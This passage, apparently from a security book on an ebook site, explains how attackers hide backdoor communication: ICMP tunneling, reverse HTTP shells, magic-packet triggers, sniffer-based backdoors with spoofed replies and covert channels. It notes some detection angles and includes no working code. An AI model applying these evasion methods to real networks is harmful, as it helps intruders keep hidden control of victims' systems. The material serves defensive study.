There is a saying that you can tunnel everything over everything else, and the “ICMP telnet” (implemented, for example, by the Loki tool) is a prime example. ICMP control messages such as Echo Request and Echo Reply (commonly used to test network connectivity) can be made to carry payloads such as command-line sessions. Many types of ICMP messages are allowed through the firewall for network performance reasons. Obviously, such packets might still be blocked by the firewall, unless they are initiated from the inside of the protected perimeter. In this case, the communication (e.g., via a regular ping) should be initiated from the inside. Such backdoors will not be seen in netstat and cannot be uncovered by port scanning the target machine. However, network IDSs pick up the unusual patterns in ICMP communication caused by the existing ICMP backdoors.

Reverse tunneled shell

This method helps with blocked outbound connections. In most environments, web browsing (access to outside machines on port 80 TCP) is allowed and often unrestricted. A remote HTTP shell imitates a connection from a browser (inside the protected perimeter) to the web server (outside). The connection itself is fully compliant with the HTTP protocol used for web browsing. The software that can interpret the “HTTP-encoded” command session plays the web server part. For example, a simple and innocuous GET command (used to retrieve web pages) might be used to retrieve special files. The requested filename can carry up to several bytes of communication from client (inside) to server (outside). “GET o.html”, then “GET v.html”, then “GET e.html”, then “GET r.html” transmits the word “over”. An algorithm for such communication might be much more elaborate. Such a backdoor is unlikely to be detected. The backdoor engine can be activated by a “magic” packet or by a timer for higher stealth.

“Magic” packet-activated backdoor

This is a mix of reverse shells and regular direct connect backdoors. The backdoor opens a port or initiates a session from the target upon receiving a specific packet, such as a TCP packet with a specific sequence number or with other inconspicuous parameters set.

No-listener (sniffer-based) backdoor

This method of hidden communication provides a high degree of stealth and includes deception capabilities. In this case, the backdoor does not open a port on a local machine, but starts sniffing network traffic instead. Upon receiving a specific packet (not even aimed at the machine with a backdoor installed, but visible to it—i.e., located on the same subnet) it executes an action and sends a response. The response is sent using a spoofed (i.e., faked) source IP address so that the communication cannot be traced back to a target. Well, actually, it can (if someone observes the layer II or MAC hardware address), but only if the observer is in the same LAN as the victim. These backdoors are just starting to pop up in rootkits. In some sense, such a backdoor is easier to detect from the host side, since it has to shift the network interface into promiscuous mode. However, this detection vulnerability is compensated for by the increased difficulty of detection from the network side, since packets are not associated with the backdoored machine. If spoofed replies are used for two-way communication, the MAC address of the real source might be revealed (if only to the sensors deployed on the same subnet as the source).

Covert channel backdoor

A full-blown covert channel (in the sense defined in the Department of Defense’s “Light Pink Book” from the Rainbow Series)[5] can be mathematically proven undetectable. If you are going to design your own signaling system and then overlay it upon the otherwise innocuous network protocol, it will probably never be detected. The number of factors that can be varied and arbitrary fields on network and application layer protocols is too high to be accounted for. For example, what if the TCP initial sequence number is not quite random but carries a pattern? What if the web server slightly changes the formatting of the web page to send a byte or two out? The possibilities are endless.

The above list demonstrates that even though hiding on a network is complicated, there are many tricks that interested parties can employ to keep their presence hidden, even under intrusion detection systems. However, the more tightly controlled the network is, the less likely it is that a covert channel will sneak through.

References



[1] Here, the definition of a covert channel does not stem from the classic definition from the “Light Pink Book” of the Rainbow Series, but simply covers any hidden method of communicating with a compromised system.

[2] Reasonably sure implies that the level of effort you apply to hiding exceeds the effort (and investment) the investigators are willing and able to make to find you.

[3] For information on LinLogFS, see http://www.complang.tuwien.ac.at/czezatke/lfs.html.

[4] A site used for tool retrieval and not for any other purpose. The term originates in the world of espionage; a spy leaves various artifacts for other spies to pick up in a dead drop box.

[5] NCSC-TG-030 [Light Pink Book] “A Guide to Understanding Covert Channel Analysis of Trusted Systems” (11/93), available at http://www.fas.org/irp/nsa/rainbow/tg030.htm.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset